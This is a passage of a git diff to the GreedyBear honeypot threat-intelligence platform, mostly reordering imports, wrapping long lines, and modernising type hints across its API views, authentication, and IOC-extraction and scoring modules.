@@ -2,13 +2,23 @@
 # See the file 'LICENSE' for copying permission.
 import logging
 
-from api.views.utils import FeedRequestParams, feeds_response, get_queryset, get_valid_feed_types
 from certego_saas.apps.auth.backend import CookieTokenAuthentication
 from certego_saas.ext.pagination import CustomPageNumberPagination
-from greedybear.consts import GET
-from rest_framework.decorators import api_view, authentication_classes, permission_classes
+from rest_framework.decorators import (
+    api_view,
+    authentication_classes,
+    permission_classes,
+)
 from rest_framework.permissions import IsAuthenticated
 
+from api.views.utils import (
+    FeedRequestParams,
+    feeds_response,
+    get_queryset,
+    get_valid_feed_types,
+)
+from greedybear.consts import GET
+
 logger = logging.getLogger(__name__)
 
 
@@ -29,7 +39,7 @@ def feeds(request, feed_type, attack_type, prioritize, format_):
     Returns:
         Response: The HTTP response with formatted IOC data.
     """
-    logger.info(f"request /api/feeds with params: feed type: {feed_type}, " f"attack_type: {attack_type}, prioritization: {prioritize}, format: {format_}")
+    logger.info(f"request /api/feeds with params: feed type: {feed_type}, attack_type: {attack_type}, prioritization: {prioritize}, format: {format_}")
 
     feed_params_data = request.query_params.dict()
     feed_params_data.update({"feed_type": feed_type, "attack_type": attack_type, "format_": format_})
diff --git a/api/views/general_honeypot.py b/api/views/general_honeypot.py
index 146ded21..0c10748a 100644
--- a/api/views/general_honeypot.py
+++ b/api/views/general_honeypot.py
@@ -2,11 +2,12 @@
 # See the file 'LICENSE' for copying permission.
 import logging
 
-from greedybear.consts import GET
-from greedybear.models import GeneralHoneypot
 from rest_framework.decorators import api_view
 from rest_framework.response import Response
 
+from greedybear.consts import GET
+from greedybear.models import GeneralHoneypot
+
 logger = logging.getLogger(__name__)
 
 
diff --git a/api/views/statistics.py b/api/views/statistics.py
index 042ab6c6..bd3db3a9 100644
--- a/api/views/statistics.py
+++ b/api/views/statistics.py
@@ -6,11 +6,12 @@
 from django.db.models import Count, Q
 from django.db.models.functions import Trunc
 from django.http import HttpResponseServerError
-from greedybear.models import IOC, GeneralHoneypot, Statistics, viewType
 from rest_framework import viewsets
 from rest_framework.decorators import action
 from rest_framework.response import Response
 
+from greedybear.models import IOC, GeneralHoneypot, Statistics, viewType
+
 logger = logging.getLogger(__name__)
 
 
diff --git a/api/views/utils.py b/api/views/utils.py
index 421d0249..7d4d8c66 100644
--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -6,16 +6,17 @@
 from datetime import datetime, timedelta
 from ipaddress import ip_address
 
-from api.enums import Honeypots
-from api.serializers import FeedsRequestSerializer
 from django.conf import settings
 from django.contrib.postgres.aggregates import ArrayAgg
 from django.db.models import F, Q
 from django.http import HttpResponse, HttpResponseBadRequest, StreamingHttpResponse
-from greedybear.models import IOC, GeneralHoneypot, Statistics
 from rest_framework import status
 from rest_framework.response import Response
 
+from api.enums import Honeypots
+from api.serializers import FeedsRequestSerializer
+from greedybear.models import IOC, GeneralHoneypot, Statistics
+
 logger = logging.getLogger(__name__)
 
 
@@ -272,7 +273,11 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
             # check if sorting the results by feed_type
             if feed_params.feed_type_sorting is not None:
                 logger.info("Return feeds sorted by feed_type field")
-                json_list = sorted(json_list, key=lambda k: k["feed_type"], reverse=feed_params.feed_type_sorting == "-feed_type")
+                json_list = sorted(
+                    json_list,
+                    key=lambda k: k["feed_type"],
+                    reverse=feed_params.feed_type_sorting == "-feed_type",
+                )
 
             logger.info(f"Number of feeds returned: {len(json_list)}")
             resp_data = {"iocs": json_list}
diff --git a/authentication/admin.py b/authentication/admin.py
index fdd1e3bd..21eb7775 100644
--- a/authentication/admin.py
+++ b/authentication/admin.py
@@ -1,6 +1,5 @@
 # This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
 # See the file 'LICENSE' for copying permission.
-from typing import Optional
 
 import email_utils
 from certego_saas.apps.user.admin import AbstractUserAdmin
@@ -38,7 +37,7 @@ class UserAdminView(AbstractUserAdmin):
     actions = ["accept_users", "decline_users"]
 
     @admin.display(boolean=True)
-    def is_email_verified(self, obj: User) -> Optional[bool]:
+    def is_email_verified(self, obj: User) -> bool | None:
         return obj.is_email_verified
 
     @admin.action(description="Decline selected users")
@@ -124,7 +123,7 @@ def user_is_active(self, obj: UserProfile) -> bool:
         return obj.user.is_active
 
     @admin.display(boolean=True)
-    def user_is_approved(self, obj: UserProfile) -> Optional[bool]:
+    def user_is_approved(self, obj: UserProfile) -> bool | None:
         return obj.user.approved
 
 
diff --git a/authentication/migrations/0001_initial.py b/authentication/migrations/0001_initial.py
index 42f67e22..da2dc841 100644
--- a/authentication/migrations/0001_initial.py
+++ b/authentication/migrations/0001_initial.py
@@ -1,13 +1,12 @@
 # Generated by Django 3.2.18 on 2023-03-22 16:14
 
-from django.conf import settings
 import django.core.validators
-from django.db import migrations, models
 import django.db.models.deletion
+from django.conf import settings
+from django.db import migrations, models
 
 
 class Migration(migrations.Migration):
-
     initial = True
 
     dependencies = [
@@ -18,15 +17,46 @@ class Migration(migrations.Migration):
         migrations.CreateModel(
             name="UserProfile",
             fields=[
-                ("id", models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name="ID")),
-                ("company_name", models.CharField(max_length=32, validators=[django.core.validators.MinLengthValidator(3)])),
-                ("company_role", models.CharField(max_length=32, validators=[django.core.validators.MinLengthValidator(3)])),
-                ("twitter_handle", models.CharField(blank=True, default="", max_length=16, validators=[django.core.validators.MinLengthValidator(3)])),
+                (
+                    "id",
+                    models.BigAutoField(
+                        auto_created=True,
+                        primary_key=True,
+                        serialize=False,
+                        verbose_name="ID",
+                    ),
+                ),
+                (
+                    "company_name",
+                    models.CharField(
+                        max_length=32,
+                        validators=[django.core.validators.MinLengthValidator(3)],
+                    ),
+                ),
+                (
+                    "company_role",
+                    models.CharField(
+                        max_length=32,
+                        validators=[django.core.validators.MinLengthValidator(3)],
+                    ),
+                ),
+                (
+                    "twitter_handle",
+                    models.CharField(
+                        blank=True,
+                        default="",
+                        max_length=16,
+                        validators=[django.core.validators.MinLengthValidator(3)],
+                    ),
+                ),
                 (
                     "discover_from",
                     models.CharField(
                         choices=[
-                            ("search_engine", "Search Engine (Google, DuckDuckGo, etc.)"),
+                            (
+                                "search_engine",
+                                "Search Engine (Google, DuckDuckGo, etc.)",
+                            ),
                             ("was_recommended", "Recommended by friend or colleague"),
                             ("social_media", "Social media"),
                             ("blog_or_publication", "Blog or Publication"),
@@ -36,7 +66,14 @@ class Migration(migrations.Migration):
                         max_length=32,
                     ),
                 ),
-                ("user", models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name="user_profile", to=settings.AUTH_USER_MODEL)),
+                (
+                    "user",
+                    models.OneToOneField(
+                        on_delete=django.db.models.deletion.CASCADE,
+                        related_name="user_profile",
+                        to=settings.AUTH_USER_MODEL,
+                    ),
+                ),
             ],
             options={
                 "verbose_name_plural": "User Profiles",
diff --git a/authentication/serializers.py b/authentication/serializers.py
index 78107c9c..bece6cad 100644
--- a/authentication/serializers.py
+++ b/authentication/serializers.py
@@ -8,15 +8,14 @@
 from certego_saas.models import User
 from certego_saas.settings import certego_apps_settings
 from django.conf import settings
-from django.contrib.auth import password_validation
 from django.core.exceptions import ValidationError
 from django.db import DatabaseError, transaction
-from django.utils.translation import gettext_lazy as _
-from greedybear.consts import REGEX_PASSWORD
 from rest_framework import serializers as rfs
 from rest_framework.authtoken.serializers import AuthTokenSerializer
 from slack_sdk.errors import SlackApiError
 
+from greedybear.consts import REGEX_PASSWORD
+
 from .models import UserProfile
 
 logger = logging.getLogger(__name__)
@@ -103,9 +102,9 @@ def validate_key(self, key):
             # custom error messages
             err_str = str(exc.detail)
             if "invalid" in err_str:
-                exc.detail = "The provided verification key" " is invalid or your email address is already verified."
+                exc.detail = "The provided verification key is invalid or your email address is already verified."
             if "expired" in err_str:
-                exc.detail = "The provided verification key" " has expired or your email address is already verified."
+                exc.detail = "The provided verification key has expired or your email address is already verified."
             raise exc
 
     def save(self):
@@ -122,7 +121,7 @@ def save(self):
             try:
                 userprofile = user.user_profile
                 user_admin_link = f"{settings.HOST_URI}/admin/certego_saas_user/user/{user.pk}"
-                userprofile_admin_link = f"{settings.HOST_URI}" f"/admin/authentication/userprofile/{userprofile.pk}"
+                userprofile_admin_link = f"{settings.HOST_URI}/admin/authentication/userprofile/{userprofile.pk}"
                 slack = Slack()
                 slack.send_message(
                     title="Newly registered user!!",
diff --git a/authentication/views.py b/authentication/views.py
index 80d5e65d..2571949b 100644
--- a/authentication/views.py
+++ b/authentication/views.py
@@ -1,5 +1,4 @@
 import logging
-from typing import List
 
 import rest_email_auth.views
 from certego_saas.apps.auth import views as certego_views
@@ -9,15 +8,24 @@
 from django.contrib.auth import get_user_model, login
 from django.core.cache import cache
 from durin import views as durin_views
-from greedybear.consts import GET
-from greedybear.enums import FrontendPage
-from greedybear.settings import AUTH_USER_MODEL
 from rest_framework import status
-from rest_framework.decorators import api_view, authentication_classes, permission_classes
+from rest_framework.decorators import (
+    api_view,
+    authentication_classes,
+    permission_classes,
+)
 from rest_framework.permissions import IsAuthenticated
 from rest_framework.response import Response
 
-from .serializers import EmailVerificationSerializer, LoginSerializer, RegistrationSerializer
+from greedybear.consts import GET
+from greedybear.enums import FrontendPage
+from greedybear.settings import AUTH_USER_MODEL
+
+from .serializers import (
+    EmailVerificationSerializer,
+    LoginSerializer,
+    RegistrationSerializer,
+)
 
 logger = logging.getLogger(__name__)
 
@@ -27,35 +35,35 @@
 
 
 class PasswordResetRequestView(rest_email_auth.views.PasswordResetRequestView):
-    authentication_classes: List = []
-    permission_classes: List = []
-    throttle_classes: List = [POSTUserRateThrottle]
+    authentication_classes: list = []
+    permission_classes: list = []
+    throttle_classes: list = [POSTUserRateThrottle]
 
 
 class PasswordResetView(rest_email_auth.views.PasswordResetView):
-    authentication_classes: List = []
-    permission_classes: List = []
-    throttle_classes: List = [POSTUserRateThrottle]
+    authentication_classes: list = []
+    permission_classes: list = []
+    throttle_classes: list = [POSTUserRateThrottle]
 
 
 class EmailVerificationView(rest_email_auth.views.EmailVerificationView):
-    authentication_classes: List = []
-    permission_classes: List = []
-    throttle_classes: List = [POSTUserRateThrottle]
+    authentication_classes: list = []
+    permission_classes: list = []
+    throttle_classes: list = [POSTUserRateThrottle]
     serializer_class = EmailVerificationSerializer
 
 
 class RegistrationView(rest_email_auth.views.RegistrationView):
-    authentication_classes: List = []
-    permission_classes: List = []
-    throttle_classes: List = [POSTUserRateThrottle]
+    authentication_classes: list = []
+    permission_classes: list = []
+    throttle_classes: list = [POSTUserRateThrottle]
     serializer_class = RegistrationSerializer
 
 
 class ResendVerificationView(rest_email_auth.views.ResendVerificationView):
-    authentication_classes: List = []
-    permission_classes: List = []
-    throttle_classes: List = [POSTUserRateThrottle]
+    authentication_classes: list = []
+    permission_classes: list = []
+    throttle_classes: list = [POSTUserRateThrottle]
 
 
 @api_view([GET])
@@ -87,7 +95,12 @@ def checkConfiguration(request):
                     errors["AWS SES backend"] = "configuration required"
             else:
                 # SMTP backend
-                required_variables = [settings.EMAIL_HOST, settings.EMAIL_HOST_USER, settings.EMAIL_HOST_PASSWORD, settings.EMAIL_PORT]
+                required_variables = [
+                    settings.EMAIL_HOST,
+                    settings.EMAIL_HOST_USER,
+                    settings.EMAIL_HOST_PASSWORD,
+                    settings.EMAIL_PORT,
+                ]
                 for variable in required_variables:
                     if not variable:
                         errors["SMTP backend"] = "configuration required"
diff --git a/greedybear/admin.py b/greedybear/admin.py
index 763c6db1..8d5bcee6 100644
--- a/greedybear/admin.py
+++ b/greedybear/admin.py
@@ -5,7 +5,18 @@
 from django.contrib import admin, messages
 from django.db.models import Q
 from django.utils.translation import ngettext
-from greedybear.models import IOC, CommandSequence, CowrieSession, FireHolList, GeneralHoneypot, MassScanner, Sensor, Statistics, WhatsMyIPDomain
+
+from greedybear.models import (
+    IOC,
+    CommandSequence,
+    CowrieSession,
+    FireHolList,
+    GeneralHoneypot,
+    MassScanner,
+    Sensor,
+    Statistics,
+    WhatsMyIPDomain,
+)
 
 logger = logging.getLogger(__name__)
 
diff --git a/greedybear/celery.py b/greedybear/celery.py
index 34311df0..e3d79c4e 100644
--- a/greedybear/celery.py
+++ b/greedybear/celery.py
@@ -1,6 +1,5 @@
 # This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
 # See the file 'LICENSE' for copying permission.
-from __future__ import absolute_import, unicode_literals
 
 import os
 
@@ -8,9 +7,10 @@
 from celery.schedules import crontab
 from celery.signals import setup_logging
 from django.conf import settings
-from greedybear.settings import EXTRACTION_INTERVAL, LEGACY_EXTRACTION
 from kombu import Exchange, Queue
 
+from greedybear.settings import EXTRACTION_INTERVAL, LEGACY_EXTRACTION
+
 os.environ.setdefault("DJANGO_SETTINGS_MODULE", "greedybear.settings")
 
 app = Celery("greedybear")
diff --git a/greedybear/cronjobs/cleanup.py b/greedybear/cronjobs/cleanup.py
index 62ec4a57..021e503d 100644
--- a/greedybear/cronjobs/cleanup.py
+++ b/greedybear/cronjobs/cleanup.py
@@ -2,7 +2,11 @@
 
 from greedybear.cronjobs.base import Cronjob
 from greedybear.models import IOC, CommandSequence, CowrieSession
-from greedybear.settings import COMMAND_SEQUENCE_RETENTION, COWRIE_SESSION_RETENTION, IOC_RETENTION
+from greedybear.settings import (
+    COMMAND_SEQUENCE_RETENTION,
+    COWRIE_SESSION_RETENTION,
+    IOC_RETENTION,
+)
 
 
 class CleanUp(Cronjob):
diff --git a/greedybear/cronjobs/commands/cluster.py b/greedybear/cronjobs/commands/cluster.py
index 88de64e6..583a1fd2 100644
--- a/greedybear/cronjobs/commands/cluster.py
+++ b/greedybear/cronjobs/commands/cluster.py
@@ -51,7 +51,7 @@ def run(self) -> None:
         tokenized_seqs = [tokenize(s.commands) for s in sequences]
         cluster_labels = LSHConnectedComponents().get_components(tokenized_seqs)
         seqs_to_update = []
-        for seq, label in zip(sequences, cluster_labels):
+        for seq, label in zip(sequences, cluster_labels, strict=False):
             if seq.cluster != label:
                 seq.cluster = label
                 seqs_to_update.append(seq)
diff --git a/greedybear/cronjobs/extraction/ioc_processor.py b/greedybear/cronjobs/extraction/ioc_processor.py
index 93b0f189..eb7a9865 100644
--- a/greedybear/cronjobs/extraction/ioc_processor.py
+++ b/greedybear/cronjobs/extraction/ioc_processor.py
@@ -1,5 +1,4 @@
 import logging
-from typing import Optional
 
 from greedybear.consts import PAYLOAD_REQUEST, SCANNER
 from greedybear.cronjobs.extraction.utils import is_whatsmyip_domain
@@ -27,7 +26,7 @@ def __init__(self, ioc_repo: IocRepository, sensor_repo: SensorRepository):
         self.ioc_repo = ioc_repo
         self.sensor_repo = sensor_repo
 
-    def add_ioc(self, ioc: IOC, attack_type: str, general_honeypot_name: str = None) -> Optional[IOC]:
+    def add_ioc(self, ioc: IOC, attack_type: str, general_honeypot_name: str = None) -> IOC | None:
         """
         Process an IOC record.
         Filters out sensor IPs and whats-my-ip domains, then creates a new
diff --git a/greedybear/cronjobs/extraction/pipeline.py b/greedybear/cronjobs/extraction/pipeline.py
index 0adec1b8..189140dc 100644
--- a/greedybear/cronjobs/extraction/pipeline.py
+++ b/greedybear/cronjobs/extraction/pipeline.py
@@ -2,9 +2,17 @@
 from collections import defaultdict
 
 from greedybear.cronjobs.extraction.strategies.factory import ExtractionStrategyFactory
-from greedybear.cronjobs.repositories import ElasticRepository, IocRepository, SensorRepository
+from greedybear.cronjobs.repositories import (
+    ElasticRepository,
+    IocRepository,
+    SensorRepository,
+)
 from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
-from greedybear.settings import EXTRACTION_INTERVAL, INITIAL_EXTRACTION_TIMESPAN, LEGACY_EXTRACTION
+from greedybear.settings import (
+    EXTRACTION_INTERVAL,
+    INITIAL_EXTRACTION_TIMESPAN,
+    LEGACY_EXTRACTION,
+)
 
 
 class ExtractionPipeline:
diff --git a/greedybear/cronjobs/extraction/strategies/cowrie.py b/greedybear/cronjobs/extraction/strategies/cowrie.py
index dd29cd24..65afa93a 100644
--- a/greedybear/cronjobs/extraction/strategies/cowrie.py
+++ b/greedybear/cronjobs/extraction/strategies/cowrie.py
@@ -3,18 +3,25 @@
 import re
 from collections import defaultdict
 from hashlib import sha256
-from typing import Optional
 from urllib.parse import urlparse
 
 from greedybear.consts import PAYLOAD_REQUEST, SCANNER
 from greedybear.cronjobs.extraction.strategies import BaseExtractionStrategy
-from greedybear.cronjobs.extraction.utils import get_ioc_type, iocs_from_hits, threatfox_submission
-from greedybear.cronjobs.repositories import CowrieSessionRepository, IocRepository, SensorRepository
+from greedybear.cronjobs.extraction.utils import (
+    get_ioc_type,
+    iocs_from_hits,
+    threatfox_submission,
+)
+from greedybear.cronjobs.repositories import (
+    CowrieSessionRepository,
+    IocRepository,
+    SensorRepository,
+)
 from greedybear.models import IOC, CommandSequence, CowrieSession
 from greedybear.regex import REGEX_URL_PROTOCOL
 
 
-def parse_url_hostname(url: str) -> Optional[str]:
+def parse_url_hostname(url: str) -> str | None:
     """
     Extract hostname from URL safely.
 
@@ -92,7 +99,7 @@ def extract_from_hits(self, hits: list[dict]) -> None:
         self._extract_possible_payload_in_messages(hits)
         self._get_url_downloads(hits)
         self.log.info(
-            f"added {len(self.ioc_records)} scanners, " f"{self.payloads_in_message} payloads found in messages, " f"{self.added_url_downloads} download URLs"
+            f"added {len(self.ioc_records)} scanners, {self.payloads_in_message} payloads found in messages, {self.added_url_downloads} download URLs"
         )
 
     def _get_scanners(self, hits: list[dict]) -> None:
@@ -208,7 +215,7 @@ def _get_sessions(self, ioc: IOC, hits: list[dict]) -> None:
             if session_record.commands is not None:
                 self._deduplicate_command_sequence(session_record)
                 self.session_repo.save_command_sequence(session_record.commands)
-                self.log.info(f"saved new command execute from {ioc.name} " f"with hash {session_record.commands.commands_hash}")
+                self.log.info(f"saved new command execute from {ioc.name} with hash {session_record.commands.commands_hash}")
 
             self.ioc_repo.save(session_record.source)
             self.session_repo.save_session(session_record)
@@ -268,7 +275,7 @@ def _add_fks(self, scanner_ip: str, hostname: str) -> None:
         # Log warning if IOCs are missing - shouldn't happen in normal operation
         if not scanner_ip_instance or not hostname_instance:
             self.log.warning(
-                f"Cannot link IOCs - missing from database: " f"scanner_ip={scanner_ip_instance is not None}, " f"hostname={hostname_instance is not None}"
+                f"Cannot link IOCs - missing from database: scanner_ip={scanner_ip_instance is not None}, hostname={hostname_instance is not None}"
             )
             return
 
diff --git a/greedybear/cronjobs/extraction/strategies/factory.py b/greedybear/cronjobs/extraction/strategies/factory.py
index 16c70d11..4efdf11a 100644
--- a/greedybear/cronjobs/extraction/strategies/factory.py
+++ b/greedybear/cronjobs/extraction/strategies/factory.py
@@ -1,4 +1,9 @@
-from greedybear.cronjobs.extraction.strategies import BaseExtractionStrategy, CowrieExtractionStrategy, GenericExtractionStrategy, Log4potExtractionStrategy
+from greedybear.cronjobs.extraction.strategies import (
+    BaseExtractionStrategy,
+    CowrieExtractionStrategy,
+    GenericExtractionStrategy,
+    Log4potExtractionStrategy,
+)
 from greedybear.cronjobs.repositories import IocRepository, SensorRepository
 
 
diff --git a/greedybear/cronjobs/extraction/strategies/log4pot.py b/greedybear/cronjobs/extraction/strategies/log4pot.py
index 3d0e8c4f..c2e92bb1 100644
--- a/greedybear/cronjobs/extraction/strategies/log4pot.py
+++ b/greedybear/cronjobs/extraction/strategies/log4pot.py
@@ -2,7 +2,6 @@
 # See the file 'LICENSE' for copying permission.
 import base64
 import re
-from typing import Optional
 from urllib.parse import urlparse
 
 from greedybear.consts import PAYLOAD_REQUEST, SCANNER
@@ -62,10 +61,10 @@ def extract_from_hits(self, hits: list[dict]) -> None:
             if match_command:
                 # we are losing the protocol but that's ok for now
                 base64_encoded = match_command.group(1)
-                self.log.info(f"found base64 encoded command {base64_encoded}" f" in payload from base64 code for CVE-2021-44228")
+                self.log.info(f"found base64 encoded command {base64_encoded} in payload from base64 code for CVE-2021-44228")
                 try:
                     decoded_str = base64.b64decode(base64_encoded).decode()
-                    self.log.info(f"decoded base64 command to {decoded_str}" f" from payload from base64 code for CVE-2021-44228")
+                    self.log.info(f"decoded base64 command to {decoded_str} from payload from base64 code for CVE-2021-44228")
                 except Exception as e:
                     self.log.warning(e, stack_info=True)
                 else:
@@ -74,7 +73,7 @@ def extract_from_hits(self, hits: list[dict]) -> None:
                         hidden_url = match_url.group()
                         if "://" not in hidden_url:
                             hidden_url = "tcp://" + hidden_url
-                        self.log.info(f"found hidden URL {hidden_url}" f" in payload for CVE-2021-44228")
+                        self.log.info(f"found hidden URL {hidden_url} in payload for CVE-2021-44228")
 
                         hidden_hostname = urlparse(hidden_url).hostname
                         self.log.info(f"extracted hostname {hidden_hostname} from {hidden_url}")
@@ -112,7 +111,7 @@ def extract_from_hits(self, hits: list[dict]) -> None:
             # once all have added, we can add the foreign keys
             self._add_fks(scanner_ip, hostname, hidden_hostname)
 
-        self.log.info(f"added {added_scanners} scanners, {added_payloads}" f" payloads" f" and {added_hidden_payloads} hidden payloads")
+        self.log.info(f"added {added_scanners} scanners, {added_payloads} payloads and {added_hidden_payloads} hidden payloads")
 
     def _add_fks(self, scanner_ip: str, hostname: str, hidden_hostname: str) -> None:
         self.log.info(f"adding foreign keys for the following iocs: {scanner_ip}, {hostname}, {hidden_hostname}")
@@ -141,7 +140,7 @@ def _add_fks(self, scanner_ip: str, hostname: str, hidden_hostname: str) -> None
                 hidden_hostname_instance.related_ioc.add(scanner_ip_instance)
             self.ioc_repo.save(hidden_hostname_instance)
 
-    def _get_scanner_ip(self, correlation_id: str, hits: list[dict]) -> Optional[str]:
+    def _get_scanner_ip(self, correlation_id: str, hits: list[dict]) -> str | None:
         self.log.info(f"extracting scanner IP from correlation_id {correlation_id}")
         filtered_hits = [hit for hit in hits if str(hit.get("correlation_id", "")) == str(correlation_id) and hit.get("reason", "") == "request"]
 
diff --git a/greedybear/cronjobs/extraction/utils.py b/greedybear/cronjobs/extraction/utils.py
index 0d64010d..5ca11253 100644
--- a/greedybear/cronjobs/extraction/utils.py
+++ b/greedybear/cronjobs/extraction/utils.py
@@ -6,6 +6,7 @@
 
 import requests
 from django.conf import settings
+
 from greedybear.consts import DOMAIN, IP
 from greedybear.models import IOC, FireHolList, MassScanner, WhatsMyIPDomain
 
@@ -204,7 +205,12 @@ def threatfox_submission(ioc_record: IOC, related_urls: list, log: Logger) -> No
         "iocs": urls_to_submit,
     }
     try:
-        r = requests.post("https://threatfox-api.abuse.ch/api/v1/", headers=headers, json=json_data, timeout=5)
+        r = requests.post(
+            "https://threatfox-api.abuse.ch/api/v1/",
+            headers=headers,
+            json=json_data,
+            timeout=5,
+        )
     except requests.RequestException as e:
         log.exception(f"Threatfox push error: {e}")
     else:
diff --git a/greedybear/cronjobs/firehol.py b/greedybear/cronjobs/firehol.py
index a9b5b54a..87498835 100644
--- a/greedybear/cronjobs/firehol.py
+++ b/greedybear/cronjobs/firehol.py
@@ -1,6 +1,7 @@
 import requests
+
 from greedybear.cronjobs.base import Cronjob
-from greedybear.models import IOC, FireHolList
+from greedybear.models import FireHolList
 
 
 class FireHolCron(Cronjob):
diff --git a/greedybear/cronjobs/mass_scanners.py b/greedybear/cronjobs/mass_scanners.py
index 81a41279..2a8a7275 100644
--- a/greedybear/cronjobs/mass_scanners.py
+++ b/greedybear/cronjobs/mass_scanners.py
@@ -1,6 +1,7 @@
 import re
 
 import requests
+
 from greedybear.cronjobs.base import Cronjob
 from greedybear.models import IOC, MassScanner
 
@@ -8,7 +9,10 @@
 class MassScannersCron(Cronjob):
     def run(self) -> None:
         regex_compiled = re.compile(r"(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*#\s*(.+)*", re.DOTALL)
-        r = requests.get("https://raw.githubusercontent.com/stamparm/maltrail/master/trails/static/mass_scanner.txt", timeout=10)
+        r = requests.get(
+            "https://raw.githubusercontent.com/stamparm/maltrail/master/trails/static/mass_scanner.txt",
+            timeout=10,
+        )
         for line_bytes in r.iter_lines():
             if line_bytes:
                 line = line_bytes.decode("utf-8")
diff --git a/greedybear/cronjobs/repositories/cowrie_session.py b/greedybear/cronjobs/repositories/cowrie_session.py
index be7dc13e..49eb5e87 100644
--- a/greedybear/cronjobs/repositories/cowrie_session.py
+++ b/greedybear/cronjobs/repositories/cowrie_session.py
@@ -1,5 +1,4 @@
 import logging
-from typing import Optional
 
 from greedybear.models import IOC, CommandSequence, CowrieSession
 
@@ -34,7 +33,7 @@ def get_or_create_session(self, session_id: str, source: IOC) -> CowrieSession:
         self.log.debug(f"created new session {session_id}" if created else f"{session_id} already exists")
         return record
 
-    def get_command_sequence_by_hash(self, commands_hash: str) -> Optional[CommandSequence]:
+    def get_command_sequence_by_hash(self, commands_hash: str) -> CommandSequence | None:
         """
         Retrieve a command sequence by its hash.
 
diff --git a/greedybear/cronjobs/repositories/elastic.py b/greedybear/cronjobs/repositories/elastic.py
index 37e7f008..e62cdc48 100644
--- a/greedybear/cronjobs/repositories/elastic.py
+++ b/greedybear/cronjobs/repositories/elastic.py
@@ -3,6 +3,7 @@
 
 from django.conf import settings
 from elasticsearch8.dsl import Q, Search
+
 from greedybear.consts import REQUIRED_FIELDS
 from greedybear.settings import EXTRACTION_INTERVAL, LEGACY_EXTRACTION
 
@@ -127,7 +128,11 @@ def _healthcheck(self):
         self.log.debug("elastic server is reachable")
 
 
-def get_time_window(reference_time: datetime, lookback_minutes: int, extraction_interval: int = EXTRACTION_INTERVAL) -> tuple[datetime, datetime]:
+def get_time_window(
+    reference_time: datetime,
+    lookback_minutes: int,
+    extraction_interval: int = EXTRACTION_INTERVAL,
+) -> tuple[datetime, datetime]:
     """
     Calculates a time window that ends at the last completed extraction interval and looks back a specified number of minutes.
 
diff --git a/greedybear/cronjobs/repositories/ioc.py b/greedybear/cronjobs/repositories/ioc.py
index 45bb41a3..0f40a9fb 100644
--- a/greedybear/cronjobs/repositories/ioc.py
+++ b/greedybear/cronjobs/repositories/ioc.py
@@ -1,5 +1,4 @@
 import logging
-from typing import Optional
 
 from greedybear.models import IOC, GeneralHoneypot
 
@@ -18,7 +17,7 @@ def __init__(self):
         """Initialize the repository and populate the honeypot cache from the database."""
         self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
         self._honeypot_cache = {hp.name: hp.active for hp in GeneralHoneypot.objects.all()}
-        self._honeypot_cache.update({name: True for name in self.SPECIAL_HONEYPOTS})
+        self._honeypot_cache.update(dict.fromkeys(self.SPECIAL_HONEYPOTS, True))
 
     def add_honeypot_to_ioc(self, honeypot_name: str, ioc: IOC) -> IOC:
         """
@@ -63,7 +62,7 @@ def get_active_honeypots(self) -> list[GeneralHoneypot]:
         """
         return list(GeneralHoneypot.objects.filter(active=True))
 
-    def get_ioc_by_name(self, name: str) -> Optional[IOC]:
+    def get_ioc_by_name(self, name: str) -> IOC | None:
         """
         Retrieve an IOC by its name.
 
@@ -78,7 +77,7 @@ def get_ioc_by_name(self, name: str) -> Optional[IOC]:
         except IOC.DoesNotExist:
             return None
 
-    def get_hp_by_name(self, name: str) -> Optional[GeneralHoneypot]:
+    def get_hp_by_name(self, name: str) -> GeneralHoneypot | None:
         """
         Retrieve a honeypot by its name.
 
diff --git a/greedybear/cronjobs/scoring/ml_model.py b/greedybear/cronjobs/scoring/ml_model.py
index dae31f23..12c1e3c9 100644
--- a/greedybear/cronjobs/scoring/ml_model.py
+++ b/greedybear/cronjobs/scoring/ml_model.py
@@ -7,11 +7,12 @@
 import pandas as pd
 from django.core.files.base import ContentFile
 from django.core.files.storage import FileSystemStorage
+from sklearn.model_selection import train_test_split
+
 from greedybear.cronjobs.scoring.consts import MULTI_VAL_FEATURES, SAMPLE_COUNT
 from greedybear.cronjobs.scoring.scorer import Scorer
 from greedybear.cronjobs.scoring.utils import multi_label_encode
 from greedybear.settings import ML_MODEL_DIRECTORY
-from sklearn.model_selection import train_test_split
 
 
 class MLModel(Scorer):
diff --git a/greedybear/cronjobs/scoring/random_forest.py b/greedybear/cronjobs/scoring/random_forest.py
index 073dd31a..bc293547 100755
--- a/greedybear/cronjobs/scoring/random_forest.py
+++ b/greedybear/cronjobs/scoring/random_forest.py
@@ -2,12 +2,13 @@
 from abc import abstractmethod
 
 import pandas as pd
+from sklearn.base import BaseEstimator
+from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor
+
 from greedybear.cronjobs.scoring.consts import MULTI_VAL_FEATURES, NUM_FEATURES
 from greedybear.cronjobs.scoring.ml_model import Classifier, MLModel, Regressor
 from greedybear.cronjobs.scoring.utils import multi_label_encode
 from greedybear.settings import ML_CONFIG_FILE
-from sklearn.base import BaseEstimator
-from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor
 
 
 class RFModel(MLModel):
@@ -86,7 +87,7 @@ def untrained_model(self) -> BaseEstimator:
             BaseEstimator: Configured but untrained scikit-learn Random Forest
                 Classifier with all hyperparameters set
         """
-        with open(ML_CONFIG_FILE, "r") as f:
+        with open(ML_CONFIG_FILE) as f:
             config = json.load(f)
 
         params = config["RFClassifier"]
@@ -118,7 +119,7 @@ def untrained_model(self) -> BaseEstimator:
             BaseEstimator: Configured but untrained scikit-learn Random Forest
                 Regressor with all hyperparameters set
         """
-        with open(ML_CONFIG_FILE, "r") as f:
+        with open(ML_CONFIG_FILE) as f:
             config = json.load(f)
 
         params = config["RFRegressor"]
diff --git a/greedybear/cronjobs/scoring/scoring_jobs.py b/greedybear/cronjobs/scoring/scoring_jobs.py
index 831798f9..015a40b7 100644
--- a/greedybear/cronjobs/scoring/scoring_jobs.py
+++ b/greedybear/cronjobs/scoring/scoring_jobs.py
@@ -1,15 +1,20 @@
 import json
-import logging
 from collections import defaultdict
 from datetime import date
 
 import pandas as pd
 from django.core.files.base import ContentFile
